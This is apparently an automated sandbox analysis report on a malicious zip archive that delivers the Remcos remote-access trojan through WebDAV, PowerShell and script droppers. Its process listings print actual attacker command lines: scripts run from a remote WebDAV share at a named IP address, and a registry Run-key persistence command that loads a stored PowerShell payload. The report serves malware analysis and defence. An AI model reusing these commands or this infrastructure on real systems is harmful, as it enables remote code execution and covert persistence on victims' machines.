File name:

SPAM.zip

Full analysis: https://app.any.run/tasks/0d097141-0041-4093-a950-20e9b8f0bb2f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 19, 2025, 11:33:19
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
arch-scr
webdav
loader
remcos
rat
remote
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

8D902EFF28BA6E36F51F3DE7EEBB4383

SHA1:

9879FA63A62EE8D1BF41DB5CF0A562D475701A32

SHA256:

2548275F19CF7FD2A9373AE5015B4041F0DA0485D2C26DA2A14EC0EB6F32F0A7

SSDEEP:

192:2M8WPAiwjpj7fK0Mo1Lyh/1UeBRxW4MclrRwP2FYU1a/Am:2P4IAreGh/13BRgh/h

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 7576)
    • WebDav connection (SURICATA)

      • explorer.exe (PID: 5492)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7200)
    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 7200)
    • Changes the autorun value in the registry

      • reg.exe (PID: 4284)
    • REMCOS mutex has been found

      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6708)
    • REMCOS has been detected (SURICATA)

      • powershell.exe (PID: 6708)
  • SUSPICIOUS

    • SMB connection has been detected (probably for file transfer)

      • explorer.exe (PID: 5492)
    • Connects to unusual port

      • svchost.exe (PID: 2320)
      • explorer.exe (PID: 5492)
      • powershell.exe (PID: 6708)
    • The process executes JS scripts

      • explorer.exe (PID: 5492)
    • Executing commands from ".cmd" file

      • wscript.exe (PID: 780)
      • wscript.exe (PID: 1452)
      • wscript.exe (PID: 4920)
      • wscript.exe (PID: 7820)
      • explorer.exe (PID: 5492)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1672)
      • cmd.exe (PID: 6700)
      • cmd.exe (PID: 7696)
      • cmd.exe (PID: 6656)
      • cmd.exe (PID: 2908)
      • explorer.exe (PID: 5492)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 780)
      • wscript.exe (PID: 4920)
      • wscript.exe (PID: 1452)
      • wscript.exe (PID: 7820)
    • Potential Corporate Privacy Violation

      • explorer.exe (PID: 5492)
    • Uses pipe srvsvc via SMB (transferring data)

      • explorer.exe (PID: 5492)
    • Abuses WebDav for code execution

      • svchost.exe (PID: 2320)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 1452)
      • wscript.exe (PID: 4920)
      • wscript.exe (PID: 7820)
      • explorer.exe (PID: 5492)
      • wscript.exe (PID: 780)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7284)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 7284)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7364)
    • Uses RUNDLL32.EXE to load library

      • svchost.exe (PID: 2320)
    • The process downloads a VBScript from the remote host

      • explorer.exe (PID: 5492)
    • Process requests binary or script from the Internet

      • svchost.exe (PID: 2320)
    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 7200)
    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 6980)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7200)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7284)
    • Creates file in the systems drive root

      • explorer.exe (PID: 5492)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 7832)
      • cmd.exe (PID: 7836)
      • cmd.exe (PID: 8060)
      • cmd.exe (PID: 1240)
    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 6708)
  • INFO

    • Creates or changes the value of an item property via Powershell

      • cmd.exe (PID: 1672)
      • cmd.exe (PID: 6700)
      • cmd.exe (PID: 7696)
      • cmd.exe (PID: 6656)
      • cmd.exe (PID: 2908)
      • explorer.exe (PID: 5492)
    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 5492)
    • Creates files or folders in the user directory

      • explorer.exe (PID: 5492)
      • BackgroundTransferHost.exe (PID: 7508)
    • Reads Microsoft Office registry keys

      • explorer.exe (PID: 5492)
    • Disables trace logs

      • powershell.exe (PID: 7200)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7364)
      • powershell.exe (PID: 7284)
    • Checks proxy server information

      • powershell.exe (PID: 7200)
      • explorer.exe (PID: 5492)
      • powershell.exe (PID: 6708)
      • slui.exe (PID: 8148)
      • powershell.exe (PID: 7284)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 7364)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4408)
      • powershell.exe (PID: 7472)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5988)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 7364)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7284)
      • powershell.exe (PID: 6980)
      • powershell.exe (PID: 6708)
      • powershell.exe (PID: 7364)
    • Autorun file from Registry key

      • reg.exe (PID: 4284)
    • Reads the software policy settings

      • slui.exe (PID: 8148)
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2025:03:19 12:31:16
ZipCRC: 0xe2209060
ZipCompressedSize: 2574
ZipUncompressedSize: 4239
ZipFileName: a.cmd
No data.
All screenshots are available in the full report
Total processes
195
Monitored processes
53
Malicious processes
18
Suspicious processes
3

Behavior graph

start winrar.exe no specs slui.exe explorer.exe svchost.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs #REMCOS powershell.exe conhost.exe no specs #REMCOS powershell.exe conhost.exe no specs #REMCOS powershell.exe conhost.exe no specs #REMCOS powershell.exe conhost.exe no specs backgroundtransferhost.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs reg.exe reg.exe no specs reg.exe no specs reg.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
PID: 780
CMD: "C:\Windows\System32\WScript.exe" "\\196.251.80.250@16309\Docs\Open - Bonida Unterlagen Schweiz.js"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 924
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1088
CMD: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path: C:\Windows\System32\BackgroundTransferHost.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID: 1240
CMD: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Draftee" /t REG_EXPAND_SZ /d "%Preprocessorernes% -windowstyle 1 $Overgreb=(gi 'HKCU:\Software\Invocational\').GetValue('Bepicture');%Preprocessorernes% ($Overgreb)"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 1452
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\js3.js"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1672
CMD: "C:\Windows\System32\cmd.exe" /c\\196.251.80.250@16309\Docs\a.cmd
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 2320
CMD: C:\WINDOWS\system32\svchost.exe -k LocalService -p -s WebClient
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
LOCAL SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2332
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2664
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2772
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
63 829
Read events
63 705
Write events
115
Delete events
9

Modification events

(PID) Process: (5492) explorer.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation: write
Name: IconLayouts
Value:
(PID) Process: (5492) explorer.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation: write
Name: IconNameVersion
Value:
1
(PID) Process: (5492) explorer.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
Operation: write
Name: LastUpdate
Value:
86ABDA6700000000
(PID) Process: (5492) explorer.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation: write
Name: CheckSetting
Value:
23004100430042006C006F00620000000000000000000000010000000000000000000000
(PID) Process: (5492) explorer.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\5\ApplicationViewManagement\W32:000000000004034C
Operation: write
Name: VirtualDesktop
Value:
1000000030304456BFA0DB55E4278845B426357D5B5F97B3
(PID) Process: (7576) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process: (7576) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process: (7576) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process: (7576) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 0
Value:
C:\Users\admin\Desktop\SPAM.zip
(PID) Process: (7576) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value:
120
Executable files
0
Suspicious files
33
Text files
22
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 7576 | Process: WinRAR.exe | Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa7576.37497\js3.js | Type: binary
MD5:A51F2D8B904BFB155BA100E7D93F58CF
SHA256:D56D8B23142A16B842E9DEDDFF2281B9DB547033447229A35CDB5A236C1B6266
PID: 7576 | Process: WinRAR.exe | Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa7576.37497\Open - Bonida Unterlagen Schweiz.js | Type: binary
MD5:B66A01E8ADFFBA2C488DE10ED16F7289
SHA256:D829439CAD19CBD47F0FB4A0A4A1968F066D96AA5FC436EE177A2EFDF3EC797C
PID: 7576 | Process: WinRAR.exe | Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa7576.37497\js2.js | Type: binary
MD5:A58F429C19B5A7F37DBD9DC9DB593C3C
SHA256:54E422EC69BE5338827096295F18D68E63587944053E3D3AF65192AF929D289B
PID: 7576 | Process: WinRAR.exe | Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa7576.37497\a.cmd | Type: text
MD5:6958CD7AE6FBB4074E49EEF0EE26762A
SHA256:7F1DDF0D05B256762152DF1EC03355C2ABABBC94B3E8D37BE4EE6E3C28AD9439
PID: 5492 | Process: explorer.exe | Filename: C:\Users\admin\Desktop\a.cmd | Type: text
MD5:6958CD7AE6FBB4074E49EEF0EE26762A
SHA256:7F1DDF0D05B256762152DF1EC03355C2ABABBC94B3E8D37BE4EE6E3C28AD9439
PID: 5492 | Process: explorer.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms | Type: binary
MD5:DCB0D8386EE8F2B02C6593877D2711D6
SHA256:C7652579F1976032B30E6A325ADFADF309603A060A9DB129C719ED8B6E609AC6
PID: 7576 | Process: WinRAR.exe | Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa7576.37497\Cristian Rus documente Elvetia.pdf.lnk.download | Type: binary
MD5:876D54A0F4878A6557E9E08A0D365A1C
SHA256:92DE472B6DFAD0781EF198D4AF2538ED2D87FBF327858D9C27BA880D4D6C162C
PID: 5492 | Process: explorer.exe | Filename: C:\Users\admin\Desktop\Cristian Rus documente Elvetia.pdf.lnk | Type: binary
MD5:876D54A0F4878A6557E9E08A0D365A1C
SHA256:92DE472B6DFAD0781EF198D4AF2538ED2D87FBF327858D9C27BA880D4D6C162C
PID: 2320 | Process: svchost.exe | Filename: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{EAE36E11-A821-4F43-AA37-E8C7E9359648}.js | Type: binary
MD5:B66A01E8ADFFBA2C488DE10ED16F7289
SHA256:D829439CAD19CBD47F0FB4A0A4A1968F066D96AA5FC436EE177A2EFDF3EC797C
PID: 4408 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9RB9AH1QUMOFHCF7TSPK.temp | Type: binary
MD5:CC9A85DD11A8B535ED073B583B054457
SHA256:9BA771B1278130BBC3D532AC8D4E5A24680C687EA60EE6D66A4C71D3E89FCF26
HTTP(S) requests
55
TCP/UDP connections
73
DNS requests
21
Threats
13

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5492
explorer.exe
OPTIONS
200
196.251.80.250:16309
http://196.251.80.250:16309/
unknown
unknown
2320
svchost.exe
OPTIONS
200
196.251.80.250:16309
http://196.251.80.250:16309/Docs/
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/Docs/
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/Docs/Open%20-%20Bonida%20Unterlagen%20Schweiz.js
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/Docs
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/Docs/a.cmd
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/Docs/a.cmd
unknown
unknown
2320
svchost.exe
GET
200
196.251.80.250:16309
http://196.251.80.250:16309/Docs/Open%20-%20Bonida%20Unterlagen%20Schweiz.js
unknown
unknown
2320
svchost.exe
PROPFIND
207
196.251.80.250:16309
http://196.251.80.250:16309/
unknown
unknown

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5556
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2112
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7432
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5492
explorer.exe
196.251.80.250:16309
SC
unknown
2320
svchost.exe
196.251.80.250:16309
SC
unknown
7200
powershell.exe
217.160.0.213:443
www.support-data.com
IONOS SE
DE
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 172.217.16.142
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
www.support-data.com
  • 217.160.0.213
unknown
client.wns.windows.com
  • 40.113.103.199
whitelisted
login.live.com
  • 20.190.159.68
  • 40.126.31.0
  • 40.126.31.128
  • 20.190.159.75
  • 40.126.31.130
  • 20.190.159.64
  • 40.126.31.67
  • 20.190.159.128
  • 40.126.32.136
  • 40.126.32.133
  • 20.190.160.128
  • 40.126.32.72
  • 20.190.160.130
  • 20.190.160.66
  • 20.190.160.67
  • 40.126.32.140
whitelisted
arc.msn.com
  • 20.199.58.43
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
  • 23.48.23.166
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted

Threats

PID
Process
Class
Message
5492
explorer.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] WebDav activity has been detected
5492
explorer.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 38
2320
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
2320
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
2320
svchost.exe
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
2320
svchost.exe
Potentially Bad Traffic
ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1
6708
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 38
6708
powershell.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
6708
powershell.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
6708
powershell.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
No debug info